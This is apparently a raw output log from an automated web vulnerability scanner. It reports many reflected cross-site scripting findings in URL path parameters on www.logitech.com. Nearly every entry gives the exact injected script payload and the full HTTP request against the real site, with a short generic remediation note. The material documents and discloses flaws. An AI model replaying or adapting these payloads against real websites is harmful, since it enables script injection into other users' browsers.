HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:25 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4808e</script><script>alert(1)</script>1eaebd570a2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /4808e</script><script>alert(1)</script>1eaebd570a2/keyboards/keyboards HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:43 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63f59"><script>alert(1)</script>f8ca943071e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us63f59"><script>alert(1)</script>f8ca943071e/keyboards/keyboards HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:37 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e6aaf</script><script>alert(1)</script>203d2519ac2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/keyboardse6aaf</script><script>alert(1)</script>203d2519ac2/keyboards HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:49 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac8cb"><script>alert(1)</script>37fb9221ad3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/keyboardsac8cb"><script>alert(1)</script>37fb9221ad3/keyboards HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:44 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8548b"><script>alert(1)</script>6971a184209 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/keyboards/keyboards8548b"><script>alert(1)</script>6971a184209 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:50 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d99f6</script><script>alert(1)</script>087b5da3a4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/keyboards/keyboardsd99f6</script><script>alert(1)</script>087b5da3a4 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:54 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 333c3</script><script>alert(1)</script>b21cae3ae7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /333c3</script><script>alert(1)</script>b21cae3ae7/mice-pointers HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:35 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb101"><script>alert(1)</script>bbfd57c5812 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-useb101"><script>alert(1)</script>bbfd57c5812/mice-pointers HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:28 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8cd67"%3b5b561ce135d was submitted in the REST URL parameter 1. This input was echoed as 8cd67";5b561ce135d in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us8cd67"%3b5b561ce135d/mice-pointers HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:28 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6f04f</script><script>alert(1)</script>69ade9082e8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/mice-pointers6f04f</script><script>alert(1)</script>69ade9082e8 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:41 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f35d8"><script>alert(1)</script>db179cae0df was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/mice-pointersf35d8"><script>alert(1)</script>db179cae0df HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:36 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e5fd1"%3b0f92023940e was submitted in the REST URL parameter 1. This input was echoed as e5fd1";0f92023940e in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-use5fd1"%3b0f92023940e/mice-pointers&geo=US HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/en-us/mice-pointers
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:45 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68f13"><script>alert(1)</script>1c711361210 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us68f13"><script>alert(1)</script>1c711361210/mice-pointers&geo=US HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/en-us/mice-pointers
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:44 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 88550</script><script>alert(1)</script>c6512673f6f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /88550</script><script>alert(1)</script>c6512673f6f/mice-pointers&geo=US HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/en-us/mice-pointers
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:52 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 58c17</script><script>alert(1)</script>9cf0a477ec8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/mice-pointers58c17</script><script>alert(1)</script>9cf0a477ec8&geo=US HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/en-us/mice-pointers
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:00 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 753ab"><script>alert(1)</script>6ce52d285fd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/mice-pointers753ab"><script>alert(1)</script>6ce52d285fd&geo=US HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/en-us/mice-pointers
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:54 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 61bfb</script><script>alert(1)</script>bd6c2c4885 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /61bfb</script><script>alert(1)</script>bd6c2c4885/mice-pointers/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:59 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f353c"><script>alert(1)</script>07d5b79f93f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /en-usf353c"><script>alert(1)</script>07d5b79f93f/mice-pointers/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:49 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 876ed"%3be404281b301 was submitted in the REST URL parameter 1. This input was echoed as 876ed";e404281b301 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us876ed"%3be404281b301/mice-pointers/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:50 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ef6e"><script>alert(1)</script>784d4c3ce5f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /en-us/mice-pointers2ef6e"><script>alert(1)</script>784d4c3ce5f/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:03 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4da99</script><script>alert(1)</script>ea2add95013 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/mice-pointers4da99</script><script>alert(1)</script>ea2add95013/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:10 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 49785</script><script>alert(1)</script>dc643cbba5b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /49785</script><script>alert(1)</script>dc643cbba5b/mice-pointers/mice HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:52 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c79fe"><script>alert(1)</script>2bc87165a56 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-usc79fe"><script>alert(1)</script>2bc87165a56/mice-pointers/mice HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:45 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ce17"><script>alert(1)</script>ad0e1f67002 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/mice-pointers6ce17"><script>alert(1)</script>ad0e1f67002/mice HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:53 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7ab65</script><script>alert(1)</script>6dd5a4e0a7d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/mice-pointers7ab65</script><script>alert(1)</script>6dd5a4e0a7d/mice HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:58 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cde00"><script>alert(1)</script>83b39610e03 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/mice-pointers/micecde00"><script>alert(1)</script>83b39610e03 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:00 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e7b82</script><script>alert(1)</script>dc818ffd8b0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/mice-pointers/micee7b82</script><script>alert(1)</script>dc818ffd8b0 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:04 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c237"><script>alert(1)</script>d8117e31c41 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
